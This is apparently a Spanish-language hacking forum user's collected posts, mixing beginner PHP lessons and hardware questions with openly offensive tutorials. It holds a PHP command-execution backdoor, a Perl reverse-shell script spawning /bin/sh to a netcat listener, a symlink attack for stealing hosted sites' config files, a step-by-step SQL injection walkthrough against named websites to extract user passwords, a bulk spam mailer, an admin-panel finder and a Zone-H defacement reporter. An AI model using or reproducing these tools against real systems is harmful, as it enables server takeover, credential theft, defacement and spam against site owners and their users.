Damos a repetir y miramos la alerta:


Existen funciones en PHP que filtran diferentes caracteres, en está entrada entenderemos 2 de ellos y cual es su función.

htmlentities()

Esa función convierte todos los caracteres html.

htmlspecialchars()

Convierte los siguentes caracteres:

Código: php
'&' (et) se convierte en '&amp;'
'"' (comillas dobles) se convierte en '&quot;' cuando ENT_NOQUOTES no está establecido.
"'" (comilla simple) se convierte en ''' (o &apos;) sólo cuando ENT_QUOTES está establecido.
'<' (menor que) se convierte en '&lt;'
'>' (mayor que) se convierte en '&gt;'


Bueno mi favorito es htmlentities(), pero puedes usar el que más te guste.

¿Como aplicarlo?

tenemos nuestro formulario y nuestro PHP:

Código: php
<form method="POST" action="archivo.php">
<input type="text" name="lol">
<input type="submit" value="Probar">
<?php
$variable = htmlentities($_POST['lol']);
echo $variable;
?>



También podemos sustituir el htmlentities por htmlspecialchars.

Saludos.
Okol.
#6
Hola amigos, espero esten bien.
de navidad mi hermano me regalo una sony VAIO no reconosco el modelo.
el la habia comprado hace tiempo, pero cuando se descompuso la dejo de usar y la arrumbo.
el problema es que la pc no prende... al principio me prendia el boton de bateria cuando conectaba el cargador pero ahora ni eso.

Podrian decirme que puedo hacer?
saludos.
#7
Hola, mi buen amigo Sanko Propuso montar un servidor en gitorius y bueno ya tenemos casi listo.
Estaba pensando quienes podrian trabajar conmigo en este lenguaje y se me ocurrio que pensaramos entre todos.

¿Que les gustaria desarrollar?




¿Quienes se anotan? -Mandenme MP no importa el nivel que tengan todo es para aprender.




espero se anoten muchos y desarrollemos algo super!
Saludos.
#8
Hola underc0de. Primero que nada quiero desear una feliz navidad a cada uno de ustedes y darles las gracias ya que poco a poco fuimos creciendo con el granito de arena de cada uno.
En esta ocasión me tomé la libertad de realizar un AdminPanel Finder en PHP pero PARA TODOS.
esta dinamica consiste en que a lo largo de este año cada uno puso un granito de arena por underc0de quiero que todos la pongan en este script.
¿Como?
Bueno yo le añadí unos paneles para buscar pero son menos de 5. quiero que todos le añadan y vallan posteando en este mismo post.
el post se fijará desde este momento se desfijará el primero de enero, dejando como este el ultimo script del año.
Espero les guste y pongan su granito de arena.!




Source:

Código: php
<title>Admin Finder</title>
<body bgcolor="black" text="green">
<center><pre>
   _____       .___      .__         ___________.__            .___           
  /  _  \    __| _/_____ |__| ____   \_   _____/|__| ____    __| _/___________
/  /_\  \  / __ |/     \|  |/    \   |    __)  |  |/    \  / __ |/ __ \_  __ \
/    |    \/ /_/ |  Y Y  \  |   |  \  |     \   |  |   |  \/ /_/ \  ___/|  | \/
\____|__  /\____ |__|_|  /__|___|  /  \___  /   |__|___|  /\____ |\___  >__|   
        \/      \/     \/        \/       \/            \/      \/    \/       
T00l dedicada a todos mis buenos amigos, mis mejores deseos esta navidad. Los quiero
Oggy,Sanko,Snifer,Crypto,Gh0st,Pr0ph3t,Antrax,Xt3mp,Moften,Turka,HD_Breaker,André,mrpack,Ns4
Y todos los miembros de underc0de.org y okol.pl Y todos mis amigos.
</pre></center>
<center><form method="POST" action="panel.php">
Ingrese url:<br /><input type="text" name="url">
<input type="submit" value="Buscar" name="buscar"><br /><br />

<?php
if(isset($_POST['buscar']))
   {
$link = htmlentities($_POST['url']);
echo 'Buscando panel para '.$link.'...<br /><br />';

$paneles = array("/wp-login.php","/wp-admin/","/administrator/","/cpanel/","/admin/","/login/","/admin2/",);
     foreach ($paneles as $panel){
$cab = @get_headers("http://$link$panel");
if($cab[0] == 'HTTP/1.1 200 OK')
     {
     echo "<font color='green'>Panel encontrado! <a href='$link$panel'>$link$panel</a><br /><br /></font>";

             }else{
     echo "<font color='red'>http://$link$panel $cab[0]<br /><br /></font>";
}

}




    }
echo '</center>';
?>
#9
Hola amigos. Recurro a esta zona para exponer una duda que tengo ya que en hardware se lo basico.
Tengo pensado hacer una mini empresa de hostings, todo serio y legal. Y para eso compraré un servidor, bueno más bién lo haré yo.

Le compraré un gabinete neon.
la tarjeta madre aún nose cual.
memoria RAM de 8 gb.
Procesador I3.
un buen quemador.

Recomiendenme una tienda para comprar todo eso a un buen precio :) y digan si conviene un servidor con esas caracteristicas.

Saludos.
#10
Back-end / PHP Zone-H Reporter
Diciembre 07, 2012, 10:04:39 PM
Hola amigos. Esperando que tengan una buena noche les venimos presentando mi querido compañero y amigo Oggy y yo Un script que programamos hace ratito.
Consiste en reportar tus defaces a zone-h.
El script está en PHP y se mira así:


Les dejo el codigo de fuente por si pueden mejorarlo.

Código: php
    <title>Zone-h Reporter</title>

<center><pre>
__________                               ___ ___   __________                             __               
\____    /Http://Okol.pl ___            /   |   \  \______   \ ____ ______   ____________/  |_  ___________
  /     //  _ \ /    \_/ __ \   ______ /    ~    \  |       _// __ \\____ \ /  _ \_  __ \   __\/ __ \_  __ \
/     /(  <_> )   |  \  ___/  /_1337/ \    Y    /  |    |   \  ___/|  |_> >  <_> )  | \/|  | \  ___/|  | \/
/_______ \____/|___|  /\___  >          \___|_  /   |____|_  /\___  >   __/ \____/|__|   |__|  \___  >__|   
        \/          \/     \/                 \/           \/     \/|__|Okol&Oggy                  \/     
</pre></center>
    <center><form method="POST" action="sc.php">
    url1:<br><input type="text" name="report" value="http://"><br>
url2:<br><input type="text" name="report1" value="http://"><br>
url3:<br><input type="text" name="report2" value="http://"><br>
url4:<br><input type="text" name="report3" value="http://"><br>
url5:<br><input type="text" name="report4" value="http://"><br>
url6:<br><input type="text" name="report5" value="http://"><br>
url7:<br><input type="text" name="report6" value="http://"><br>
url8:<br><input type="text" name="report7" value="http://"><br>
url9:<br><input type="text" name="report8" value="http://"><br>
url10:<br><input type="text" name="report9" value="http://"><br>
    nick: <br><input type="text" name="nick"><br>
    razon: <br><input type="text" name="rason"><br>
    Modo De hackeo:<br><input type="text" name="mode"><br>
    <input type="submit" value="Reportar">
    </form></center>
   
    <font size="5" color="red">Modo De Hackeo:</font>
<pre>
    [1] known vulnerability (i.e. unpatched system) -> vulnerabilidad conocida (es decir, sistema sin parchear)
    [2] undisclosed (new) vulnerability -> no divulgada (nueva) vulnerabilidad
    [3] configuration / admin. mistake -> Error de configuracion Del Admin
    [4] brute force attack -> Ataque de fuerza bruta
    [5] social engineering -> Ingenieria Social
    [6] Web Server intrusion -> Intrusion a el servidor web
    [7] Web Server external module intrusion -> Intrusión en el modulo externo del servidor
    [8] Mail Server intrusion -> Intrusion por el servidor del email (SMTP)
    [9] FTP Server intrusion -> Intrusion FTP
    [10] SSH Server intrusion -> Intrusion al servidor SSH
    [11] Telnet Server intrusion -> Intrusion al servidor Telnet
    [12] RPC Server intrusion -> Intrusion RPC
    [13] Shares misconfiguration -> Mala Configuracion
    [14] Other Server intrusion -> Otra intrusion en el servidor
    [15] SQL Injection -> Injeccion SQL (SQLi)
    [16] URL Poisoning -> Envenenamiento de URL
    [17] File Inclusion -> Intrusion de archivo
    [18] Other Web Application bug -> Otro error de aplicacion Web
    [19] Remote administrative panel access through bruteforcing -> Acceso remoto a traves de un panel administrativo con fuerza bruta
    [20] Remote administrative panel access through password guessing -> Adivinando la Password
    [21] Remote administrative panel access through social engineering -> Acceso remoto a traves de ingenieria social
    [22] Attack against the administrator/user (password stealing/sniffing) -> Ataque contra el administrador / usuario
    [23] Access credentials through Man In the Middle attack -> Obteniendo credenciales de acceso
    [24] Remote service password guessing -> Adivinando la contraseña del servicio
    [25] Remote service password bruteforce -> Fuerza bruta a el servicio
    [26] Rerouting after attacking the Firewall -> Atacando el firewall
    [27] Rerouting after attacking the Router -> Atacando el router
    [28] DNS attack through social engineering -> Ataque DNS con ingenieria social
    [29] DNS attack through cache poisoning -> Envenenamiento de cache
    [30] Not available -> No avaliable
    [31] Cross-Site Scripting -> XSS
</pre>
    <font size="5" color="red">Razones De El Hackeo:</font>
<pre>
    [1] Heh...just for fun! -> Por divercion
    [2] Revenge against that website -> La venganza contra este sitio web
    [3] Political reasons -> Razones de politica
    [4] As a challenge -> Un desafio
    [5] I just want to be the best defacer -> Busco ser el mejor defacer
    [6] Patriotism -> Patriotismo
    [7] Not available -> Ninguna.
    </pre>
     
    <?php
    if(isset($_POST['report']))
    {
    @$rason=is_numeric(htmlentities($_POST['rason']));
    @$modohackeo=htmlentities($_POST['mode']);
    @$defacer = htmlentities($_POST['nick']);
    @$url = htmlentities($_POST['report']);
    @$url2 = htmlentities($_POST['report1']);
    @$url3 = htmlentities($_POST['report2']);
    @$url4 = htmlentities($_POST['report3']);
    @$url5 = htmlentities($_POST['report4']);
    @$url6 = htmlentities($_POST['report5']);
    @$url7 = htmlentities($_POST['report6']);
    @$url8 = htmlentities($_POST['report7']);
    @$url9 = htmlentities($_POST['report8']);
    @$url10 = htmlentities($_POST['report9']);
    function ReportarSuperCaker($url,$url2,$url3,$url4,$url5,$url6,$url7,$url8,$url9,$url10,$defacer,$modohackeo,$rason)
    {
     
    $ch = curl_init("http://zone-h.com/notify/mass");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$defacer&domain1=$url&domain2=$url2&domain3=$url3&domain4=$url4&domain5=$url5&domain6=$url6&domain7=$url7&domain8=$url8&domain9=$url9&domain10=$url10&hackmode=$modohackeo&reason=$rason");
    curl_exec($ch);
    curl_close($ch);
    }
     
    ReportarSuperCaker("$url","$url2","$url3","$url4","$url5","$url6","$url7","$url8","$url9","$url10","$defacer","$modohackeo","$rason");
     
    }
     

    ?>


Toda sugerencia es bienvenida.
Saludos.
#11
Pentesting / Creando un minibackdoor en PHP
Noviembre 24, 2012, 04:19:32 PM
 Hola amigos, hoy explicaré como backdorizar una web. Es decir como crear un archivo que ejecute comandos, ya sea en linux o windows (Depende que servidor sea).
Esto es más seguro ya que solo deja 1 log y si lo haces con metodo POST no deja logs. El codigo seria así:
Código: php

<form method="GET" action="lol.php">
<input type="text" name="comando">
<input type="submit" value="ejecutar">
<?php
if(isset($_GET['comando']));
{
$lol = @system($_GET['comando']);


echo $lol;
}
?>

En el formulario ponemos que comando ejecutar, asi tenemos control sobre el servidor y podemos ejecutar cualquier comando, si te da la gana usas wget (LINUX) y subes una shell y la borras, un claro ejemplo de como funciona seria este:



Explicaré un poco la función por la que nuestro Mini Backdoor trabaja:
System: Es una función que permite ejecutar comandos dentro de un servidor.

En la foto lo que hicé fue ejecutar el comando cat /etc/passwd y como pueden ver se ejecuto satisfactoriamente.

Otra cosa que podemos hacer es poner
Código: php
$lol = @system($_GET['comando']);

en algún archivo ejemplo index.php y llamar a la variable lol por url y ejecutar el comando un ejemplo seria No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

y ejecutaria lo que es el comando.
Agradecimientos: Oggy & HD_Breaker
Espero que les haya gustado.
Un saludo.
#12
Off Topic / Que Musica Me Recomiendan Para Programar
Octubre 21, 2012, 11:15:03 PM
Hola pues como dice el titulo...
Ando buscando musica que no sea ni metal ni rock ni tampoco muy tranquila...
Uds saben algo que no te duerma pero que tampoco te distraiga!
Espero tengan algunas...
#13
Back-end / Underc0de Mailer [Basico]
Octubre 21, 2012, 05:36:48 PM
Hola amigos, me puse a programar un mailer para testear unas cosillas y pues esta muy basico...
Son 2 archivos, Bueno les dejo el source:

index.php:

Código: php
<head><title>Mailer</title>
<body bgcolor="black" text="gray">
<center><img src="http://underc0de.org/foro/Themes/insidv2/images/theme/logo.png"></center>

<CENTER><form method="post" action="enviar.php">
Desde:<input type="text"name="from"><br /><br />
Asunto<input type="text"name="asunto"><br /><br />
Numero De Mensajes<input type="text"name="num"><br /><br />
Para:<textarea name="para"></textarea><br>
[*]Si son varios mails separalos por coma...<br><br />
Contenido:<TEXTAREA name="cont"></TEXTAREA><br>
<center><input type="submit" value="Spam!"><br /></center>
</form></CENTER>
<center><font size="3" color="red">Powered By Okol | 2012</font></center>


Enviar.php:

Código: php
<center><img src="http://underc0de.org/foro/Themes/insidv2/images/theme/logo.png"></center>
<body bgcolor="black" text="red">

<?php
//Powered By Okol for Underc0de
//Greetz All friends
$desde = $_POST['from'];
$para= $_POST['para'];
$contenido= $_POST['cont'];
$asunto= $_POST['asunto'];
$numsj= $_POST['num'];
$lol=0;
while($lol < $numsj){
$lol=$lol + 1;
mail($para,$asunto,$contenido,'From:'.$desde);
                    }
if($para != '' && $asunto != '' && $contenido != '' && $desde != '' && $numsj != '')
{
echo'<center>Enviado Correctamente!<br>';

}else{
echo '<center>No se pudo enviar el mensaje, Todos los campos son obligatorios<br>';
}
echo 'Tu IP Es '.$_SERVER['REMOTE_ADDR']. 'Solo por seguridad...';
?>



Aclaracion: El mailer no manda codigo HTML porque testee con las headers pero no me enviava nada...

Si alguen puede arreglarlo se lo agradeceré
Saludos!!!
#14
Explicare como Conectarnos a un servidor y como seleccionar la base de datos para almacenar los mismos!
Empezamos:

¿Que servidor usaremos?

Yo usare localhost (En mi caso es Appserv) Pero pueden usar otros como xampp Bueno Después procederemos a Poner nuestra conección a el servidor así:

Código: php
<?php

$con=mysql_connect("Servidor","Usuario de el servidor","password")or die(mysql_error());//Conectando a el Servidor
/* En xampp user es root y no tiene password*/
?>


//La funcion or die(mysql_error()) Significa decir: Dime el error que tengo

//La funcion mysql_connect("","","") Dice: Conectate a este servidor por este usuario y por esta contraseña, Asi estamos conectados al servidor

Ok ya tenemos conectado al servidor
Ahora pasaremos a Seleccionar la base de datos con una linea asi:
Código: php
<?php
mysql_select_db('nombredb', $con);//Seleccionamos la Base de datos
?>


Bueno Pronto hare un tutorial sobre como almacenar datos en la DB Mientras tanto les recomiendo practicar
Saludos
By Okol
#15
Off Topic / Cuentanos tu motivacion para programar
Octubre 19, 2012, 12:18:52 AM
Hola bueno habro este post para que uds pongan cual es su motivacion para tener imaginacion y por lo tanto programar "Como dios manda"

Mi forma de imaginar es fumarme un porro y asi vienen 100 ideas para hacer los scripts mas locos y divertidos!

Espero haya mas movimiento en esta zona y todos cuenten cual es su motivacion

FOTO De mi Motivacion:



Saludos!!!
#16
Back-end / Como juntar 2 imagenes en php
Octubre 07, 2012, 12:44:06 PM
Hola amigos de nuevo soy yo y pues sigo estudiando mas PHP y quiero compartirles esto
que le sera de ayuda almenos a uno.
Bueno se trata de juntar dos imagenes en PHP es algo sencillo y funcional :D
Como para dejar una marca de agua
Comenzamos!

Código: php
<?PHP
header("content-type: image/jpg");

$primera=imagecreatefromjpeg('yaoo.jpg');#Primera
$segunda=imagecreatefromjpeg('troll.jpg');#Segunda
//Asi se crean las dos imagenes que utilizaremos

#Una imagen sobre la otra
imagecopy($primera,$segunda,300,300,0,0,211,170); //<-- Cordenadas

#Damos Resultado...
imagejpeg($primera);

#Destruimos ambas!
imagedestroy($primera);
imagedestroy($segunda);


?>


Quedaria algo asi


Dudas ami MP.
Saludos.
#17
Bugs y Exploits / Como hacer una BackConect By Okol
Septiembre 09, 2012, 09:12:23 PM
Hola, Ya de regreso por este foro tan bello :D Publicare un pequeño tuto de una forma de hacer backconect con CMD (Windows) & Una shell en algun servidor...

Ok lo primero que haremos sera habrir el cmd y ejecutar el netcat
¿Como? Ok les explico...

Bajamos el Netcat No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Lo metemos al disco C renombrandolo nc

Ok ahora habrimos cmd y ejecutamos cd.. dos veces para que quede asi:



Despues de eso ejecutamos cd nc Nos quedaria algo asi



Ok ya tenemos el Netcat abierto ahora le diremos Pon ala escucha "Tal puerto" ¿Como? Ejecutando el comando nc -lnvp puerto, En mi caso seria nc -lnvp 113

Quedaria asi:



Ok ya tenemos ala escucha el puerto...

Ahora nos bajamos un Backdoor.. yo usare este


Código: php
#By xDarkSton3x
#2011
#!/usr/bin/perl
use Socket;
use FileHandle;
$IP = $ARGV[0];
$PORT = $ARGV[1];
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($PORT,inet_aton($IP)));
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "########################################\n";
print "#   Back Connect Script By xDarkSton3x       #\n";
print "########################################\n";
system("/bin/sh -i");
#Contact: [email protected]


(Esta en Perl)
Ok ahora subimos a nuestra phpshell el script con nombre.txt ejemplo back.txt



Ya que tenemos arriva el back.txt vamos a ejecutar un comando y ejecutamos...

perl back.txt ip puerto  Asi:



Despues de eso deveriamos recivir en el netcat algo asi...




Si se quieren ahorrar lo de el script en perl les dejo una shell con opcion de backconect donde solo pones tu ip y el puerto y te llega al netcat



La shell es:

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
(No la pongo en code porque no permite tantos caracteres)

Saludos
#18
Bugs y Exploits / Symlink con la tool
Mayo 21, 2012, 02:28:00 PM
Hola amigos del foro hoy les dare un tutorial de Symlink pero con la TOOL's despues enseñare a hacerlo manual espero les guste Empezamos

Bueno primero tenemos una shell subida

1- Creamos un directorio que quede algo asi
Public_Html/tudirectorio en este caso Public_html/okol

2- en ese directorio subimos el archivo en perl
Descarga No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

3- Le das permisos 775 con este comando
chmod 775 No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

4- Subimos un .htaccess a el directorio nuevo (okol)
Descarga No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

5-Ahora ejecutamos este comando en la shell
cat /etc/passwd

6-Copiamos TODO lo que salga en la consola y abrimos No tienes permitido ver los links. Registrarse o Entrar a mi cuenta la web que estamos cagando xD)

7- pegamos todo en el No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y le damos a buscar

8- Entramos a el directorio No tienes permitido ver los links. Registrarse o Entrar a mi cuenta y VUALA Tenemos los config.php de todas las webs alojadas en ese shared ahora lo que sigue

9- desde la shell vas a la opcion SQL y pones los datos de la db de los .txt que salen ahi

10- Buscas Users

11- encryptas la pass que quieres en md5 y la pegas en donde dice password

12- hay scripts que te dicen que dominio es para que accedas o en el mismo config.php si es joomla te sale en el sitename o queda buscar en google

Espero les haya gustado el tuto amigos

Saludos :)
#19
Bugs y Exploits / Tutorial Sqli Manual By Okol
Mayo 20, 2012, 08:51:16 PM
Hola amigos me ezforze mucho escribiendo este tuto para uds espero les guste :)
Saludos

Sqli Manual

en este caso una variable aki viene siendo

Código: php
http://www.icvp.mx/enfermedades_detalle.php?id=5


la variable id resultado de la variable 5un ejemplo

Código: php
http://www.icvp.mx/enfermedades_detalle.php?id=5&ref=google&a=b


vendrian siendo las variables
id
ref
co
a

Código: php
http://www.icvp.mx/enfermedades_detalle.php?id=5&ref=google.com&g=d&cos=sss 


si queeremos comprobar que la variable g es vulnerable donde pondriamos la comilla?

Código: php
http://www.icvp.mx/enfermedades_detalle.php?id=5&ref=google.com&g=d'&cos=sss


cuando verifiques si una variable es vulnerable pruebas asi:
Código: php
http://gogo.com/index.php?var=vuln' y http://gogo.com/index.php?var='vuln

de las dos maneras pruebas

para saber cuantas columnas tiene podemos poner

Código: php
http://www.icvp.mx/enfermedades_detalle.php?id=5+order+by+6

si ponemos
Código: php
http://www.icvp.mx/enfermedades_detalle.php?id=5+order+by+7

sale ke no existe pero con 6 sale bien quiere decir que tiene 6
columnas

Código: php
http://www.icvp.mx/enfermedades_detalle.php?id=5+union+select+1,2,3,4,5,6,


salta normal

Código: php
http://www.icvp.mx/enfermedades_detalle.php?id=5+union+select+1,2,3,4,5,6,7

salta error quiere decir que es la 6

notA: una injeccion siempre deve tener -- al final ejemplo
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

tambien se puede hacer

Código: php
http://www.icvp.mx/enfermedades_detalle.php?id=5+union+select+0,1,2,3,4,5--


(Desde el 1 al 6 o desde 0 al 5) es lo mismo

Para que query se vuelva negativo y sake un error hay ke poner un - antes de la variable vulnerable
ejemplo

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Salen unos numeros botados por ahi en este caso es el 4 si le damos click a el error que sale
salen los numeros 4 3 y 6

Cada numero esta involucrado en la injeccion

Código: php
ejemplo http://www.icvp.mx/enfermedades_detalle.php?id=-5+union+select+0,1,2,3,4,5,--

saldrian 5 3 2

esos numeros estan haciendo querys ala db

con este comando database()

se saca el nombre de la db
Como?

sustituimos un numero ke imprime 5 3 o 2 ejemplo

Código: php
http://www.icvp.mx/enfermedades_detalle.php?id=-5+union+select+0,1,2,3,4,database()--


para ver la version de PHP enves de poner database()

se pone version()

(en otro numero que imprima en estecaso 2) ejemplo

Código: php
http://www.icvp.mx/enfermedades_detalle.php?id=-5+union+select+0,1,version(),3,4,5--


Para sacar las tablas...

cuando quieras sacar informacion de las tablas nombres o cantidad de tablas lo sacamos de
information_schema.tables


y cuando sea de columnas

information_schema.colums

si queremos sacar las columnas la url seria asi

Código: php
http://www.tacosaltos.com/index2.php?o=CA&catID=-4+union+select+1,column_name,3,4,5,6+FROM+information_schema.columns--


y las tablas

Código: php
http://www.tacosaltos.com/index2.php?o=CA&catID=-4+union+select+1,table_name,3,4,5,6+FROM+information_schema.tables--


en algunos casos nos sale solo 1 tabla para ir sabiendo mas tablas

aplicamos LIMIT+1+1--
LIMIT+2+1-- asi succesivamente

Código: php
http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.tables+LIMIT+4,1--



ya que sacamos las tablas encontramos la tabla usuarios users o algo asi

Código: php
http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,table_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.tables+LIMIT+49,1--


ya tenemos eso ahora que hacemos?
encriptamos la tabla en ascii to hex
les recomiendoe sta web para encryptarlo No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ok ahora en la url sustituimos los table_name por column_name y en information_schema.tables ponemos
information_schema.columns seguido de un +where+table_name=el codigo encriptado(le agregamos un 0x al inicio y le quitamos los espacios)
y el limit lo ponemos en 1,1
Quedaria algo asi

Código: php
http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+information_schema.columns+where+table_name=0x7573657273+LIMIT+1,1--


ven la url? nos tira username ahora moveremos el 1,1 asi 2,1 3,1 sucesivamente hasta que salga pass o algo parecido

Ahora borramos hasta que quede la injeccion normal algo asi

Código: php
http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+


donde dice from+ le ponemos el nombre de la tabla (users) quedaria asi

Código: php
http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,column_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+users--


cambiamos el column_name por el nombre de la columna que queremos ejemplo

Código: php
http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,username,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+users--


Código: php
http://www.telemedik.com/articulos.php?id=-288+union+select+1,2,3,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19+FROM+users--


Si tienen dudas ami privado amigos
Gracias Dedalo - me enseño como :)
Saludos ;)
#20
Hola bueno empesando con este hermozo lenguaje llamado PHP
que mi gran maestro XT3MP me esta enseñando les dejare lo que aprendi hoy

Bueno mi primer clase de PHP se trato de esto

Para iniciar un archivo en php es
Código: php
<?php
//y para terminarlo
?>


echo es el valor que imprimira en la pantalla un ejemplo echo 'Primera clase';

Código: php
<?php
echo 'Okol Aprendiz php';
?>


el ; indica cierre de linea y para pasar a otra linea es asi

Código: php
<?php
echo 'Okol<br />';
echo 'aprendiz PHP';
?>


el primer ejemplo seria:
Okol aprendiz php


y el segundo:
Okol
aprendiz PHP


y si ponemos digamos
Código: php
<?php
echo 'okol';
echo 'aprendiz PHP';
?>


quedaria asi: okol aprendiz PHP

un ejemplo un poco mas avanzado seria

Código: php
<?php
echo 'Me llamo Okol<br />';
echo 'Tengo 16 años<br />';
echo 'Y estudio PHP';
?>


Los comentarios en PHP

Un comentario es un texto que no se imprimira en pantalla pero sirve para indicar
las notas de el codigo  un ejemplo de un comentario seria

Código: php
<?php
echo 'Hola gente<br />';
echo 'Me llamo Okol< br />';
echo 'y tengo 16 años';
?>


Con comentarios seria

Código: php
<?php
#Esto Imprime Hola gente
echo 'Hola gente<br />';
//Esto imprime Me llamo Okol
echo 'Me llamo Okol<br />';
/*
Esto Imprime Tengo 16 años
*/
echo 'Tengo 16 años'
?>


las 3 tipos de comentarios # en una linea // en una linea

/*
en 2 lineas
*/

Variables

Existen 4 tipos de variables.
String > Cadena de texto
Integer > Numero entero
Double o Float > Numero con decimales
Boolean o Boleano > Verdadero o falso, true o false, 1 o 0.

Concatenacion de variables
Es unir texto con alguna variable o función
un ejemplo

Código: php
<?php
$ComoMeLLamo = 'Okol';
echo 'Que tal '.$ComoMeLLamo.' Esta es la concatenacion de variables';
?>


Lo que se imprimiria en pantalla seria Que tal Okol esta es la concatenacion de variables

el punto (.) es lo que une las variables
#21
Dudas y pedidos generales / Ayuda zeus 2.8.9
Abril 16, 2012, 02:12:06 PM
Hola amigos bueno hoy estaba kakeando en un servidor para aprender y bueno me encontre con esto

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta (es link de screnshot)

bueno despues de encontrarme con eso me dijeron que me conectara ala db con una shell y ya lo ise

me conecto a jos_users asi No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

ahora muchos me dijeron que cambiara el pass si lose pero que coño en que hash o eso es lo que no me explico :S espero puedan responderme
#22
Hola amigos bueno decidi diseñar estos basicos desings espero les gusten



Ese es el wall




Ese es el logo

Saludos criticas postenlas :)
#23
Hola pues les dejo este video de cybergate si no comprenden ya saben pueden ir ami privado  8)



PD NO LO DESCARGUEN DE LA DESCRIPCION MI CUENTA DE YOUTUBE FUE ROBADA Y ESTA INFECTADO

Saludos
#24
Hola amigos esto es algo pues basico pero les dejo el tutorial de spynet hecho por mi espero les guste y cualquier duda ami privado  8)



PD: no lo descarguen de ahi ya que mi cuenta de youtube fue robada y infectaron las descargas

SALUDOS